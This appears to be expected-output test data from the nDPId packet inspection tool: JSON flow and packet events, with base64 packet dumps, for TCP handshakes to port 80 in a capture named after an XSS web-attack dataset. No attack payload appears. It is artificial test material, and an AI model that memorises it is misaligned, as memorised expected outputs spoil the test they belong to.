-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3960,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":279,"flow_packet_id":2,"flow_last_seen":1499347442626,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347442626,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ35b747kmEdbvRKAScSCDygAAAgQFtAQCCAoD5IkyATq3vAEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3961,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":279,"flow_packet_id":3,"flow_last_seen":1499347442627,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347442627,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0WQBAAD4GbNisEAABwKgKMt+WAFAR1u9E++O5J4AQAOUi0gAAAQEICgE6t7wD5Iky"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3977,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":280,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347445158,"flow_last_seen":1499347445158,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347445158,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57264,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3977,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":280,"flow_packet_id":1,"flow_last_seen":1499347445158,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347445158,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8\/otAAD4Gx0SsEAABwKgKMt+wAFCaOES+AAAAAKACchDknAAAAgQFtAQCCAoBOro1AAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3978,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":280,"flow_packet_id":2,"flow_last_seen":1499347445158,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347445158,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ37CiJaNtmjhEv6AScSAQWQAAAgQFtAQCCAoD5IurATq6NQEDAwc="} -00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3979,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":280,"flow_packet_id":3,"flow_last_seen":1499347445159,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347445159,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0\/oxAAD4Gx0usEAABwKgKMt+wAFCaOES\/oiWjboAQAOWvYAAAAQEICgE6ujUD5Iur"} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3986,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":204,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347315631,"flow_last_seen":1499347320705,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347445734,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55888,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3986,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":204,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347315631,"flow_last_seen":1499347320705,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347445734,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55888,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3986,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":205,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347318180,"flow_last_seen":1499347323705,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347445734,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55914,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3986,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":205,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347318180,"flow_last_seen":1499347323705,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347445734,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55914,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3986,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":206,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347319466,"flow_last_seen":1499347324705,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347445734,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55928,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3986,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":206,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347319466,"flow_last_seen":1499347324705,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347445734,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55928,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3986,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":207,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347320712,"flow_last_seen":1499347326706,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347445734,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55942,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3986,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":207,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347320712,"flow_last_seen":1499347326706,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347445734,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55942,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3986,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":208,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347323234,"flow_last_seen":1499347328706,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347445734,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55968,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3986,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":208,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347323234,"flow_last_seen":1499347328706,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347445734,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55968,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3986,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":209,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347324538,"flow_last_seen":1499347329706,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347445734,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55982,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3986,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":209,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347324538,"flow_last_seen":1499347329706,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347445734,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55982,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3989,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":281,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347446419,"flow_last_seen":1499347446419,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347446419,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57278,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3989,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":281,"flow_packet_id":1,"flow_last_seen":1499347446419,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347446419,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8oGtAAD4GJWWsEAABwKgKMt++AFBFYxsbAAAAAKACchBhzAAAAgQFtAQCCAoBOrtwAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3990,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":281,"flow_packet_id":2,"flow_last_seen":1499347446420,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347446420,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ376sLltvRWMbHKAScSDKQgAAAgQFtAQCCAoD5IzmATq7cAEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3991,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":281,"flow_packet_id":3,"flow_last_seen":1499347446420,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347446420,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0oGxAAD4GJWysEAABwKgKMt++AFBFYxscrC5bcIAQAOVpSQAAAQEICgE6u3ED5Izm"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4001,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":282,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347447671,"flow_last_seen":1499347447671,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347447671,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57292,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4001,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":282,"flow_packet_id":1,"flow_last_seen":1499347447671,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347447671,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8XZhAAD4GaDisEAABwKgKMt\/MAFDFCOExAAAAAKACchAayQAAAgQFtAQCCAoBOrypAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4002,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":282,"flow_packet_id":2,"flow_last_seen":1499347447671,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347447671,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ38yhpTp2xQjhMqAScSCtiAAAAgQFtAQCCAoD5I4fATq8qQEDAwc="} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4003,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":282,"flow_packet_id":3,"flow_last_seen":1499347447671,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347447671,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0XZlAAD4GaD+sEAABwKgKMt\/MAFDFCOEyoaU6d4AQAOVMkAAAAQEICgE6vKkD5I4f"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4019,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":283,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347450180,"flow_last_seen":1499347450180,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347450180,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57318,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4019,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":283,"flow_packet_id":1,"flow_last_seen":1499347450180,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347450180,"pkt":"ABm5CmnxAMGxFOsxCABFAAA82VFAAD4G7H6sEAABwKgKMt\/mAFCGVWZMAAAAAKACchDR0wAAAgQFtAQCCAoBOr8dAAAAAAEDAwc="} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4020,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":283,"flow_packet_id":2,"flow_last_seen":1499347450180,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347450180,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ3+bg3FPQhlVmTaAScSAJjwAAAgQFtAQCCAoD5JCSATq\/HQEDAwc="} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4021,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":283,"flow_packet_id":3,"flow_last_seen":1499347450181,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347450181,"pkt":"ABm5CmnxAMGxFOsxCABFAAA02VJAAD4G7IWsEAABwKgKMt\/mAFCGVWZN4NxT0YAQAOWolgAAAQEICgE6vx0D5JCS"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4031,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":284,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347451427,"flow_last_seen":1499347451427,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347451427,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57332,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4031,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":284,"flow_packet_id":1,"flow_last_seen":1499347451427,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347451427,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8gftAAD4GQ9WsEAABwKgKMt\/0AFCzvkGvAAAAAKACchDHwgAAAgQFtAQCCAoBOsBUAAAAAAEDAwc="} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4032,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":284,"flow_packet_id":2,"flow_last_seen":1499347451427,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347451427,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ3\/Qj19JNs75BsKAScSA8zgAAAgQFtAQCCAoD5JHKATrAVAEDAwc="} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4033,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":284,"flow_packet_id":3,"flow_last_seen":1499347451428,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347451428,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0gfxAAD4GQ9ysEAABwKgKMt\/0AFCzvkGwI9fSToAQAOXb1QAAAQEICgE6wFQD5JHK"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4043,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":285,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347452731,"flow_last_seen":1499347452731,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347452731,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57346,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4043,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":285,"flow_packet_id":1,"flow_last_seen":1499347452731,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347452731,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8OxxAAD4GirSsEAABwKgKMuACAFCP5\/qGAAAAAKACchAxbgAAAgQFtAQCCAoBOsGaAAAAAAEDAwc="} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4044,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":285,"flow_packet_id":2,"flow_last_seen":1499347452731,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347452731,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ4AJ1f\/zHj+f6h6AScSApEQAAAgQFtAQCCAoD5JMQATrBmgEDAwc="} -00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4045,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":285,"flow_packet_id":3,"flow_last_seen":1499347452732,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347452732,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0Ox1AAD4GirusEAABwKgKMuACAFCP5\/qHdX\/8yIAQAOXIGAAAAQEICgE6wZoD5JMQ"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4061,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":286,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347455224,"flow_last_seen":1499347455224,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347455224,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57372,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4061,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":286,"flow_packet_id":1,"flow_last_seen":1499347455224,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347455224,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8z+5AAD4G9eGsEAABwKgKMuAcAFC7QQvkAAAAAKACchDyLAAAAgQFtAQCCAoBOsQKAAAAAAEDAwc="} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4062,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":286,"flow_packet_id":2,"flow_last_seen":1499347455224,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347455224,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ4BwGoR45u0EL5aAScSA0zgAAAgQFtAQCCAoD5JV\/ATrECgEDAwc="} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4063,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":286,"flow_packet_id":3,"flow_last_seen":1499347455225,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347455225,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0z+9AAD4G9eisEAABwKgKMuAcAFC7QQvlBqEeOoAQAOXT1QAAAQEICgE6xAoD5JV\/"} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4070,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":210,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347325777,"flow_last_seen":1499347331707,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347455736,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55996,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4070,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":210,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347325777,"flow_last_seen":1499347331707,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347455736,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55996,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4070,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":211,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347328298,"flow_last_seen":1499347333709,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347455736,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56022,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4070,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":211,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347328298,"flow_last_seen":1499347333709,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347455736,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56022,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 